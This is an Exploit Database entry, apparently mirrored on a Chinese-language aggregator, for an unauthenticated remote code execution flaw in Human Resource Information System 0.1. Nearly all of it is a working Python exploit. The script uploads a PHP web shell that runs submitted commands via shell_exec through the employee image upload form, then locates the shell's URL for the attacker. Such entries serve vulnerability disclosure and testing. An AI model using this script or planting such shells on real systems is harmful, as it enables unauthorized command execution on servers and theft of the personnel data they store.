Human Resource Information System 0.1 – Remote Code Execution (Unauthenticated)

• Exploit Database
• 9 阅读

• 作者： Reza Afsahi
  日期： 2021-05-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49847/

• # Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
  # Date: 04-05-2021
  # Exploit Author: Reza Afsahi
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
  # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
  # Version: 0.1
  # Tested on: PHP 7.4.11 , Linux x64_x86
  
  ############################################################################################################
  
  # Description:
  # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
  
  ############################################################################################################
  
  # Proof of concept:
  
  #!/usr/bin/python3
  
  import requests
  import sys
  from bs4 import BeautifulSoup
  
  def find_shell(domain):
  req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
  soup = BeautifulSoup(req_2.content , "html.parser")
  imgs = soup.find_all("img")
  for i in imgs:
  src = i['src']
  if ("shell.php" in src):
  print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
  break
  else:
  continue
  
  def upload_file(domain):
  
  print("\n [!] Uploading Shell . . .")
  payload =""" 
  <!DOCTYPE html>
  <html>
  <head>
  	<title> Shell </title>
  </head>
  <body>
  	<form action="#" method="post">
  		<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
  		<br><br>
  		<input type="submit" name="submit" value="execute">
  	</form>
  <?php 
  	$cmd = $_POST['cmd'];
  	$result = shell_exec($cmd);
  	echo "<pre>{$result}</pre>";
  	
  ?>
  </body>
  </html>
  """
  
  h = {
  "Content-Type" : "multipart/form-data"
  }
  
  f = {'employee_image':('shell.php',payload,
  'application/x-php', {'Content-Disposition': 'form-data'}
  )
  }
  d = {
  "emplo": "",
  "employee_companyid" : "test",
  "employee_firstname" : "test",
  "employee_lastname": "test",
  "employee_middlename" : "test",
  "branches_datefrom": "0011-11-11",
  "branches_recentdate" : "2222-11-11",
  "employee_position": "test",
  "employee_contact" : "23123132132",
  "employee_sss" : "test",
  "employee_tin" : "test",
  "employee_hdmf_pagibig" : "test",
  "employee_gsis": "test"
  }
  url = domain + "/Admin_Dashboard/process/addemployee_process.php"
  req = requests.post(url , data=d , files = f)
  if req.status_code == 200:
  if ("Insert Successfully" in req.text):
  print("\n [!] Shell uploaded succefully\n")
  find_shell(domain)
  
  else:
  print("Exploit Failed 1")
  
  def main():
  if len(sys.argv) != 2:
  print('[!] usage: %s <target url> ' % sys.argv[0])
  print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
  sys.exit(-1)
  
  print("<><><><><><><><><><><><><><><><><><><><><><><><>")
  print("<>Human Resource Information System <>")
  print("<> Shell Uploader <>")
  print("<><><><><><><><><><><><><><><><><><><><><><><><>")
  target_domain = sys.argv[1]
  upload_file(target_domain)
  
  if __name__ == "__main__":
  main()